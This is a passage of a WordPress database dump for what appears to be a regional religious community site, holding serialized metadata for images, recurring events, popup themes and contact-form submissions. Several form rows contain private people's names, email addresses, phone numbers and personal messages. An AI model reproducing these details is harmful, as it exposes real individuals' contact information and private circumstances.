20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(96716,262259,'_wp_attached_file','2020/10/welcome-ocean-1.jpg'),(96717,262259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:27:\"2020/10/welcome-ocean-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"welcome-ocean-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"welcome-ocean-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"welcome-ocean-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"welcome-ocean-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"welcome-ocean-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"welcome-ocean-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(96718,262259,'_edit_lock','1603746362:2'),(96719,262262,'_field_97','Julie'),(96720,262262,'_field_98','Adams'),(96721,262262,'_field_99','julieadams00@gmail.com'),(96722,262262,'_field_100','(720) 375-4377'),(96723,262262,'_field_101','Denver'),(96724,262262,'_field_104','family-and-youth-coordinator'),(96725,262262,'_field_105','Hi there- I was hoping to get in contact with Hanna regarding my daughter’s career interest as she is currently applying for internships. I’ve talked with Hanna about meeting up with her in the past years and hopefully setting up an appointment via online will work. You can share my contact information with Hanna. Thank you. Julie Adams'),(96726,262262,'_form_id','10'),(96727,262262,'_seq_num','16'),(95790,262102,'_edit_last','2'),(104111,262441,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1607071445;s:12:\"_EventOrigin\";i:1607071445;s:13:\"_thumbnail_id\";i:1607071861;s:24:\"boldgrid_hide_page_title\";i:1607071445;s:17:\"_EventShowMapLink\";i:1607071445;s:13:\"_EventShowMap\";i:1607071445;s:15:\"_EventStartDate\";i:1607071861;s:13:\"_EventEndDate\";i:1607071861;s:18:\"_EventStartDateUTC\";i:1607071861;s:16:\"_EventEndDateUTC\";i:1607071861;s:14:\"_EventDuration\";i:1607071861;s:20:\"_EventCurrencySymbol\";i:1607071445;s:22:\"_EventCurrencyPosition\";i:1607071445;s:10:\"_EventCost\";i:1607071445;s:9:\"_EventURL\";i:1607071445;s:14:\"_EventTimezone\";i:1607071445;s:18:\"_EventTimezoneAbbr\";i:1607071445;s:27:\"_EventNextPendingRecurrence\";i:1607071445;s:26:\"_RTECregistrationsDisabled\";i:1607071445;s:17:\"_RTECdeadlineType\";i:1607071445;s:19:\"_RTECwhoCanRegister\";i:1607071445;s:23:\"_RTEClimitRegistrations\";i:1607071445;s:21:\"_RTECmaxRegistrations\";i:1607071445;s:16:\"_EventRecurrence\";i:1607071445;s:18:\"_RTECnumRegistered\";i:1607071445;s:12:\"_dp_original\";i:1607071445;s:13:\"_EventVenueID\";i:1607071445;s:16:\"tribe_events_cat\";i:1609185788;s:10:\"_edit_last\";i:1607071468;s:12:\"post_content\";i:1607072314;s:10:\"post_title\";i:1607071652;s:11:\"post_status\";i:1607071861;}'),(95777,262101,'_field_224','Joyce'),(95778,262101,'_field_225','Dyer'),(95779,262101,'_field_226','jaelene812@yahoo.com'),(95780,262101,'_field_227','NJ'),(95781,262101,'_field_228','US'),(95782,262101,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(95783,262101,'_form_id','21'),(95784,262101,'_seq_num','107'),(95785,262102,'protect_children',''),(95786,262102,'_edit_lock','1699995923:2'),(117248,262888,'_EventCost',''),(117249,262888,'_EventURL',''),(117250,262888,'_EventTimezone','America/Denver'),(117251,262888,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117280,262889,'_EventTimezone','America/Denver'),(117262,262889,'protect_children',''),(117277,262889,'_EventCurrencyPosition','prefix'),(117256,262889,'_EventStartDate','2021-07-11 12:15:00'),(117257,262889,'_EventStartDateUTC','2021-07-11 18:15:00'),(117279,262889,'_EventURL',''),(117258,262889,'_EventEndDate','2021-07-11 13:45:00'),(117259,262889,'_EventEndDateUTC','2021-07-11 19:45:00'),(117278,262889,'_EventCost',''),(117260,262889,'_EventDuration','5400'),(117261,262889,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512444;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512444;s:26:\"_RTECregistrationsDisabled\";i:1607512444;s:17:\"_RTECdeadlineType\";i:1607512444;s:19:\"_RTECwhoCanRegister\";i:1607512444;s:23:\"_RTEClimitRegistrations\";i:1607512444;s:21:\"_RTECmaxRegistrations\";i:1607512444;s:16:\"_EventRecurrence\";i:1607512444;s:17:\"_EventShowMapLink\";i:1607512444;s:13:\"_EventShowMap\";i:1607512444;s:13:\"_EventVenueID\";i:1607512444;s:20:\"_EventCurrencySymbol\";i:1607512444;s:22:\"_EventCurrencyPosition\";i:1607512444;s:10:\"_EventCost\";i:1607512444;s:9:\"_EventURL\";i:1607512444;s:14:\"_EventTimezone\";i:1607512444;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512444;s:16:\"tribe_events_cat\";i:1607537644;}'),(117263,262889,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512444;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512444;s:26:\"_RTECregistrationsDisabled\";i:1607512444;s:17:\"_RTECdeadlineType\";i:1607512444;s:19:\"_RTECwhoCanRegister\";i:1607512444;s:23:\"_RTEClimitRegistrations\";i:1607512444;s:21:\"_RTECmaxRegistrations\";i:1607512444;s:16:\"_EventRecurrence\";i:1607512444;s:17:\"_EventShowMapLink\";i:1607512444;s:13:\"_EventShowMap\";i:1607512444;s:13:\"_EventVenueID\";i:1607512444;s:20:\"_EventCurrencySymbol\";i:1607512444;s:22:\"_EventCurrencyPosition\";i:1607512444;s:10:\"_EventCost\";i:1607512444;s:9:\"_EventURL\";i:1607512444;s:14:\"_EventTimezone\";i:1607512444;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512444;s:16:\"tribe_events_cat\";i:1607537644;}'),(151806,266081,'mec_additional_organizer_ids','a:0:{}'),(117266,262889,'_RTECregistrationsDisabled','1'),(117267,262889,'_RTECdeadlineType','start'),(117268,262889,'_RTECwhoCanRegister','any'),(117269,262889,'_RTEClimitRegistrations','0'),(117270,262889,'_RTECmaxRegistrations','30'),(117264,262889,'_EventOrigin','events-calendar'),(117271,262889,'boldgrid_hide_page_title','0'),(117272,262889,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117273,262889,'_EventShowMapLink','1'),(117274,262889,'_EventShowMap','1'),(117275,262889,'_EventVenueID','262507'),(117276,262889,'_EventCurrencySymbol',''),(93623,261713,'popup_theme_data_version','3'),(93624,261713,'_pum_built_in','floating-bar'),(93625,261713,'protect_children',''),(93626,261714,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";s:1:\"0\";s:13:\"atc_promotion\";N;s:17:\"container_padding\";s:1:\"8\";s:23:\"container_border_radius\";s:1:\"0\";s:26:\"container_background_color\";s:7:\"#eef6fc\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"23\";s:30:\"container_boxshadow_horizontal\";s:1:\"1\";s:28:\"container_boxshadow_vertical\";s:1:\"1\";s:24:\"container_boxshadow_blur\";s:1:\"3\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:16:\"title_font_color\";s:7:\"#505050\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_line_height\";s:2:\"36\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"400\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:18:\"content_font_color\";s:7:\"#505050\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"400\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:22:\"close_position_outside\";i:0;s:14:\"close_location\";s:11:\"middleright\";s:18:\"close_position_top\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"5\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"18\";s:11:\"close_width\";s:2:\"18\";s:19:\"close_border_radius\";s:2:\"15\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:1:\"0\";s:16:\"close_font_color\";s:7:\"#505050\";s:15:\"close_font_size\";s:2:\"15\";s:17:\"close_line_height\";s:2:\"18\";s:17:\"close_font_family\";s:10:\"Sans-Serif\";s:17:\"close_font_weight\";s:3:\"700\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:5:\"solid\";s:18:\"close_border_color\";s:7:\"#505050\";s:18:\"close_border_width\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:1:\"0\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:1:\"0\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";}'),(93620,261712,'_form_id','13'),(93621,261712,'_seq_num','49'),(93622,261713,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";s:1:\"0\";s:13:\"atc_promotion\";N;s:17:\"container_padding\";s:1:\"8\";s:23:\"container_border_radius\";s:1:\"0\";s:26:\"container_background_color\";s:7:\"#eef6fc\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"23\";s:30:\"container_boxshadow_horizontal\";s:1:\"1\";s:28:\"container_boxshadow_vertical\";s:1:\"1\";s:24:\"container_boxshadow_blur\";s:1:\"3\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:16:\"title_font_color\";s:7:\"#505050\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_line_height\";s:2:\"36\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"400\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:18:\"content_font_color\";s:7:\"#505050\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"400\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:22:\"close_position_outside\";i:0;s:14:\"close_location\";s:11:\"middleright\";s:18:\"close_position_top\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"5\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"18\";s:11:\"close_width\";s:2:\"18\";s:19:\"close_border_radius\";s:2:\"15\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:1:\"0\";s:16:\"close_font_color\";s:7:\"#505050\";s:15:\"close_font_size\";s:2:\"15\";s:17:\"close_line_height\";s:2:\"18\";s:17:\"close_font_family\";s:10:\"Sans-Serif\";s:17:\"close_font_weight\";s:3:\"700\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:5:\"solid\";s:18:\"close_border_color\";s:7:\"#505050\";s:18:\"close_border_width\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:1:\"0\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:1:\"0\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";}'),(93608,261711,'_field_133','Glenda'),(93609,261711,'_field_134','Watson'),(93610,261711,'_field_135','glendagwatson@aol.com'),(93611,261711,'_field_137','I am interested in information about contemplative gatherings.  Are there any groups meeting in Idaho Springs?'),(93612,261711,'_field_138','I am interested in information about contemplative gatherings.  Are there any groups meeting in Idaho Springs? '),(93613,261711,'_form_id','13'),(93614,261711,'_seq_num','48'),(93615,261712,'_field_133','Laurah'),(93616,261712,'_field_134','Brock Young'),(93617,261712,'_field_135','laurahbrockyoung@gmail.com'),(93618,261712,'_field_137','Contact information for ECKists in Cortez'),(93619,261712,'_field_138','HI. I am a long time ECKists that will most likely be moving to Cortez next spring. I will be going back and forth before then and would like to meet an or some ECKists in the area when I visit before the move. I know it is impossible right now with the pandemic, but perhaps I could talk with someone? I am very active in AZ and want to continue. I am curious as to what has been going on in this area.\n\nThank you kindly in ECK,\n\nLaurah Brock Young\n602-799-7974\n'),(116349,262857,'protect_children',''),(116350,262857,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607511499;s:12:\"_EventOrigin\";i:1607511499;s:10:\"_edit_last\";i:1607511508;s:10:\"post_title\";i:1607511604;s:12:\"post_content\";i:1607513658;s:11:\"post_status\";i:1607511718;s:16:\"tribe_events_cat\";i:1607536918;s:13:\"_thumbnail_id\";i:1607511718;s:26:\"_RTECregistrationsDisabled\";i:1607511718;s:17:\"_RTECdeadlineType\";i:1607511718;s:19:\"_RTECwhoCanRegister\";i:1607511718;s:23:\"_RTEClimitRegistrations\";i:1607511718;s:21:\"_RTECmaxRegistrations\";i:1607511718;s:24:\"boldgrid_hide_page_title\";i:1607511718;s:16:\"_EventRecurrence\";i:1607513658;s:17:\"_EventShowMapLink\";i:1607511718;s:13:\"_EventShowMap\";i:1607511718;s:13:\"_EventVenueID\";i:1607511718;s:15:\"_EventStartDate\";i:1607511718;s:13:\"_EventEndDate\";i:1607511718;s:18:\"_EventStartDateUTC\";i:1607511718;s:16:\"_EventEndDateUTC\";i:1607511718;s:14:\"_EventDuration\";i:1607511718;s:20:\"_EventCurrencySymbol\";i:1607511718;s:22:\"_EventCurrencyPosition\";i:1607511718;s:10:\"_EventCost\";i:1607511718;s:9:\"_EventURL\";i:1607511718;s:14:\"_EventTimezone\";i:1607511718;s:18:\"_EventTimezoneAbbr\";i:1607511718;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513660;}'),(116351,262857,'_EventOrigin','events-calendar'),(116352,262857,'_edit_lock','1619132755:2'),(116353,262857,'_edit_last','2'),(116355,262857,'_RTECregistrationsDisabled','1'),(116356,262857,'_RTECdeadlineType','start'),(116357,262857,'_RTECwhoCanRegister','any'),(116358,262857,'_RTEClimitRegistrations','0'),(116359,262857,'_RTECmaxRegistrations','30'),(116360,262857,'boldgrid_hide_page_title','0'),(94764,261877,'data_version','3'),(94763,261877,'protect_children',''),(97317,130320,'_EventNextPendingRecurrence','2022-12-25 10:30:00'),(20042,130320,'_EventTimezoneAbbr','MDT'),(20041,130320,'_EventTimezone','America/Denver'),(20040,130320,'_EventURL',''),(20039,130320,'_EventCost',''),(20038,130320,'_EventCurrencyPosition','prefix'),(20037,130320,'_EventCurrencySymbol',''),(20036,130320,'_EventDuration','5400'),(20035,130320,'_EventEndDateUTC','2019-09-22 18:00:00'),(20034,130320,'_EventStartDateUTC','2019-09-22 16:30:00'),(20033,130320,'_EventEndDate','2019-09-22 12:00:00'),(131906,263791,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(131907,263791,'_RTECregistrationsDisabled','1'),(131871,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(119960,263006,'_EventOrigin','events-calendar'),(119961,263006,'_EventOrigin','events-calendar'),(119962,263006,'_EventOrigin','events-calendar'),(119963,263006,'_EventOrigin','events-calendar'),(119964,263006,'_thumbnail_id','262990'),(119981,263006,'_RTECdeadlineType','start'),(119982,263006,'_RTECwhoCanRegister','any'),(119983,263006,'_RTEClimitRegistrations','0'),(119984,263006,'_RTECmaxRegistrations','30'),(119985,263006,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119986,263006,'_RTECnumRegistered','0'),(119987,263006,'_EventVenueID','262435'),(119989,263006,'_dp_original','262989'),(20023,130320,'_EventOrigin','events-calendar'),(20024,130320,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";d:1566043031;s:24:\"boldgrid_hide_page_title\";d:1566043031;s:16:\"_EventRecurrence\";i:1606922405;s:17:\"_EventShowMapLink\";d:1566043031;s:13:\"_EventShowMap\";d:1566043031;s:13:\"_EventVenueID\";d:1566043031;s:15:\"_EventStartDate\";d:1566043164;s:13:\"_EventEndDate\";d:1566043188;s:18:\"_EventStartDateUTC\";d:1566043164;s:16:\"_EventEndDateUTC\";d:1566043188;s:14:\"_EventDuration\";d:1566043188;s:20:\"_EventCurrencySymbol\";d:1566043031;s:22:\"_EventCurrencyPosition\";d:1566043031;s:10:\"_EventCost\";d:1566043031;s:9:\"_EventURL\";d:1566043031;s:14:\"_EventTimezone\";d:1566043031;s:18:\"_EventTimezoneAbbr\";d:1566043031;s:27:\"_EventNextPendingRecurrence\";i:1606573347;s:13:\"_thumbnail_id\";d:1566043031;s:16:\"tribe_events_cat\";i:1606947605;s:12:\"_dp_original\";d:1566043031;s:10:\"_edit_last\";d:1566043097;s:12:\"post_content\";i:1579516408;s:11:\"post_status\";d:1566043164;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922416;s:16:\"protect_children\";i:1579516407;s:10:\"post_title\";i:1579516408;s:26:\"_RTECregistrationsDisabled\";i:1606922405;s:17:\"_RTECdeadlineType\";i:1606922405;s:19:\"_RTECwhoCanRegister\";i:1606922405;s:23:\"_RTEClimitRegistrations\";i:1606922405;s:21:\"_RTECmaxRegistrations\";i:1606922405;s:22:\"_EventHideFromUpcoming\";i:1606922405;}'),(20025,130320,'_EventOrigin','events-calendar'),(20026,130320,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";d:1566043031;s:24:\"boldgrid_hide_page_title\";d:1566043031;s:16:\"_EventRecurrence\";i:1606922405;s:17:\"_EventShowMapLink\";d:1566043031;s:13:\"_EventShowMap\";d:1566043031;s:13:\"_EventVenueID\";d:1566043031;s:15:\"_EventStartDate\";d:1566043164;s:13:\"_EventEndDate\";d:1566043188;s:18:\"_EventStartDateUTC\";d:1566043164;s:16:\"_EventEndDateUTC\";d:1566043188;s:14:\"_EventDuration\";d:1566043188;s:20:\"_EventCurrencySymbol\";d:1566043031;s:22:\"_EventCurrencyPosition\";d:1566043031;s:10:\"_EventCost\";d:1566043031;s:9:\"_EventURL\";d:1566043031;s:14:\"_EventTimezone\";d:1566043031;s:18:\"_EventTimezoneAbbr\";d:1566043031;s:27:\"_EventNextPendingRecurrence\";i:1606573347;s:13:\"_thumbnail_id\";d:1566043031;s:16:\"tribe_events_cat\";i:1606947605;s:12:\"_dp_original\";d:1566043031;s:10:\"_edit_last\";d:1566043097;s:12:\"post_content\";i:1579516408;s:11:\"post_status\";d:1566043164;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922416;s:16:\"protect_children\";i:1579516407;s:10:\"post_title\";i:1579516408;s:26:\"_RTECregistrationsDisabled\";i:1606922405;s:17:\"_RTECdeadlineType\";i:1606922405;s:19:\"_RTECwhoCanRegister\";i:1606922405;s:23:\"_RTEClimitRegistrations\";i:1606922405;s:21:\"_RTECmaxRegistrations\";i:1606922405;s:22:\"_EventHideFromUpcoming\";i:1606922405;}'),(20028,130320,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103343,130320,'_EventHideFromUpcoming','yes'),(20031,130320,'_EventVenueID','51883'),(20032,130320,'_EventStartDate','2019-09-22 10:30:00'),(20027,130320,'boldgrid_hide_page_title','0'),(20029,130320,'_EventShowMapLink','1'),(20030,130320,'_EventShowMap','1'),(20045,130320,'_dp_original','130134'),(20046,130320,'_edit_lock','1606947660:2'),(20047,130320,'_edit_last','2'),(117221,262887,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117232,262888,'protect_children',''),(117244,262888,'_EventShowMap','1'),(117226,262888,'_EventStartDate','2021-06-13 12:15:00'),(117227,262888,'_EventStartDateUTC','2021-06-13 18:15:00'),(117243,262888,'_EventShowMapLink','1'),(117228,262888,'_EventEndDate','2021-06-13 13:45:00'),(117229,262888,'_EventEndDateUTC','2021-06-13 19:45:00'),(117230,262888,'_EventDuration','5400'),(117231,262888,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(117233,262888,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(94479,261784,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in 